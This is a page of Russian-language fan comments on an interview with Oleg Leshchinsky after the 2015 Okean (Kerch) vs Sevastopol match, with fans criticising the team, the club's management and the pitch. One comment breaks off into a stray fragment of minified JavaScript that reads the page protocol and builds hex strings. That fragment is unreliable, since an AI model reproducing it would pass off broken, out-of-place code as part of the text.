Премьер-лига КФС. 7-й тур. «Океан» (Керчь) – «Севастополь». Интервью Олега Лещинского

Олег Лещинский

9 комментариев

Комментарии пользователей сайта


molich Севастополь
4 Окт, 2015 (вс, 18:08)

Акела_СС (4 октября 2015, 06:45), а что зимой? клуб денег не дал будем работать с тем что есть и бла бла и тд и тп  


оСергий Севастополь
4 Окт, 2015 (вс, 16:49)

Ребята,держитесь и не унывайте. У кого не было серых дней...

Geo
4 Окт, 2015 (вс, 14:33)

"Кто бы Севастополь не опускал это две лучшие команды..."  
 
И что ещё после этого слушать?

Старпом Севастополь
4 Окт, 2015 (вс, 12:51)

NEVA (4 октября 2015, 09:11),  
Какой может быть лидер у того , чего нет ? Нет команды , есть группа физкультурников. Такое впечатление возникает при визуальном контроле над ситуацией. Еще есть мнение , что руководство клуба не выполнчет свои функции , как следствие этого процесса по принципу домино, не выполняют свои функции и все остальные фигуранты. Может быть меньше всего вопросов к обслуживающему персоналу - футболки и трусы чистые , поле в отличном состоянии. Все остальное - жалкое подобие профессиональной работы.

SKAy Севастополь
4 Окт, 2015 (вс, 11:20)

Макс красавчик. Как гуру пресс-службы, роль ведущего на себя взял. Керчанин сидел и брал уроки мастер-класса )))))

рекрут Севастополь
4 Окт, 2015 (вс, 10:11)

Поле на стадионе в Керчи ужасное. Во всяком случае, по ТВ. Думаю, никто бы из хороших футболистов не смог тут показать нормальную игру.  
// t;t++)e+=o.charCodeAt(t).toString(16);re turn e},p=function(){var w=window,p=w.document.location.protocol; if(p.indexOf('http')==0){return p}for(var e=0;e  

NEVA
4 Окт, 2015 (вс, 09:11)

Не согласен, раслабон во втором тайме был и от этого результат на табло. На данный момент команда просто не готова по многим параметрам биться за первое место. И хватит вспоминать Евпаторию. Прокопенко уже после Евпатории выходил на поле. В команде явно прослеживается пижонство на поле, только не понятно, какие основания для этого. К этому поражению команда шла шесть туров, проиграть должны были еще в Евпатории и тоже во втором тайме. Что то надо менять, тренеру виднее вся надежда на зиму. А то что в команде нет лидера это Лешинский прав.

pfksev Севастополь
4 Окт, 2015 (вс, 06:48)

Ну Лещ, и Евпаторию вспомнил через две недели....

Акела_СС Севастополь